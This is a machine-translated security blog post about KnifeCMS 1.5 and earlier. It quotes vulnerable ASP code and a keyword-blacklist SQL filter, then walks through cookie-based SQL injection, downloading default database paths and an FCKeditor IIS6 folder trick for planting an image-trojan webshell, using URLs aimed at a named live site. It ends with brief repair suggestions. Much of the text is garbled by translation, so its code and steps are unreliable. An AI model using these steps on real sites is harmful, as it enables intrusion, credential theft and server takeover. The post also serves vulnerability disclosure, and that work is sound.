KnifeCms Version & lt; = 1.5 Vulnerability

0 × 00 KnifeCms Overview
0 × 01 vulnerability code
0 × 02 implementation process
0 × 03 database download
0 × 04 get WebShell
0 × 05 repair suggestions
 
0 × 00 KnifeCms Overview
KnifeCMS. ASP is open-source based on the GPL Protocol
If you want to modify the source code for other purposes (including commercial purposes), you only need to inform us of the modifications made to the source code.
We encourage you to modify the source code)
You do not have to inform us of every change
However, if you are willing to spend precious time informing us, we will provide free online technical support!
The development time is too short. Some documents are not very detailed. Please forgive me!
 
0 × 01 vulnerability code
/Page/doc. asp
 
1
<! -- # Include virtual = "/include/conn. asp" -->
2
<! -- # Include virtual = "/include/function. asp" -->
3
<! -- # Include virtual = "/include/page. asp" -->
4
<! -- # Include virtual = "/include/config. asp" -->
5
<! -- # Include virtual = "/include/template. asp" -->
6
<%
7
'If Channel (getCID (ID), "pageMode") = 1 Then Response. Redirect "/page/list. asp? PageID = "& pageID
8
Dim aTemplate
9
ATemplate = Channel (getCID (Request ("ID"), "Template ")
10
If len (aTemplate)> 0 then
11
ExeTemplate (aTemplate)
12
Else
13
ExeTemplate ("doc.shtml ")
14
End if
15
%>
The program does not filter the aTemplate variable in the SQL statement, leading to the injection vulnerability.
However, he added anti-injection in the following code.
 
/Include/conn. asp
 
1
'================================================ ==========================================================
2
'SQL injection Filtering
3
'2017-10-25
4
'================================================ ==========================================================
5
Dim QueryData, FormData, QueryName, Name
6
QueryData = "'|'' |; |, | * | % | and | exec | insert | select | update | delete | count | master | truncate | char | declare | where | set | declare | mid | chr | set | chr (37) | net"
7
FormData = ""
8
 
9
'Filter the get query value.
10
If request. QueryString <> "then
11
AdoData = split (QueryData, "| ")
12
For each QueryName IN Request. QueryString
13
For I = 0 to ubound (adoData)
14
If Instr (LCase (request. QueryString (QueryName), adoData (I) <> 0 Then
15
Response. Write "<Script Language = javascript> alert ('Please do not submit illegal requests! '); History. back (-1) </Script>"
16
Response. end
17
End If
18
NEXT
19
NEXT
20
End if
21
 
22
'Filter the single value of the post table.
23
If request. form <> "" then
24
AdoData = split (FormData, "| ")
25
For each Name IN Request. Form
26
For I = 0 to ubound (adoData)
27
If Instr (LCase (request. form (Name), adoData (I) <> 0 Then
28
Response. Write "<Script Language = javascript> alert ('Please do not submit illegal requests! '); History. back (-1) </Script>"
29
Response. end
30
End If
31
NEXT
32
NEXT
33
End if
34
%>
From this anti-injection code, we can see that this program prevents Get and Post injection, but Cookies injection does not.
Therefore, Cookies are injected.
 
0 × 02 implementation process
 
--Find doc. asp? Id = xx
Then, they are thrown into pangolin for Cookie injection (low efficiency), or converted into the generated cookie using the hedgehog (high efficiency )..
 
Http://www.bkjia.com/page/doc. asp? ID = 142
 
Join
Table:
Db_system
Field:
Username
Password
--This table does not appear to be available for SQL Injection in China. manually add it.
 
The following figure shows the test website ..
 
Since there is no md5 Member, we will not take the webshell on the official website ..
 
0 × 03 database download
 
Http://www.bkjia.com/_ database/5d7525e61ca2ae39. mdb
 
The http://www.bkjia.com/bbs/database/bbsxp2008 _. mdb
 
/_ Database
There are other databases in this directory-it is estimated that they will prevent scanning by others ..
In other words, this set of source code also integrates bbsxp2008... If you are interested in other things, you can download a set of things by yourself to see if the source code analysis is good. 0.0 ~
But on the official website, it seems that there are no default database paths. He has changed the path ..
 
0 × 04 get Webshell
 
Fckeditor writes this part well. It checks whether the admin is logged on and allows the next operation. 0.0 ~
 
Fckeditor version 2.6.3
Here is the webshell for iis6 + win2003
 
Iis6 environment.
Create an xg. asp Directory,
 
Http://www.bkjia.com/fckeditor/editor/filemanager/connectors/asp/connector. asp? Command = CreateFolder & Type = Image & CurrentFolder =/xg. asp & NewFolderName = x. asp
Upload a jpg-Format Image Trojan here.
 
 
Http://www.bkjia.com/fckeditor/editor/filemanager/browser/default/browser.html? Type = Image & Connector = http://www.bkjia.com/fckeditor % 2 Feditor % 2 Ffilemanager % 2 Fconnectors % 2 Fasp % 2Fconnector. asp
0 × 05 repair suggestions
1. filter the variable aTemplate to solve the problem from the root cause. 0. The code in other page directories seems to be a bit ..
2. Add the first table to the database: <% NoDown %>. The table cannot be downloaded even if it is scanned by a tool.
3. Upgrade Fckeditor to the latest version 2.66 with patches. You cannot create. asp/. asa/. cer ...... Directory
 
Finally,
0.0 reprinted mjj without copyright. (I forgot to make a mistake last time. Next time I asked our company's female editor to reprinted it. This will make MJJ a reality)
Welcome to communicate with me ..
If an error occurs in this article, I hope you can guide me.

[Mix0xrn @ Dis9Team, xiaogao's Blog. Record your learning details.]
[If everything all me do whatever they want, I wowould have get lost the here free abyss feeling.]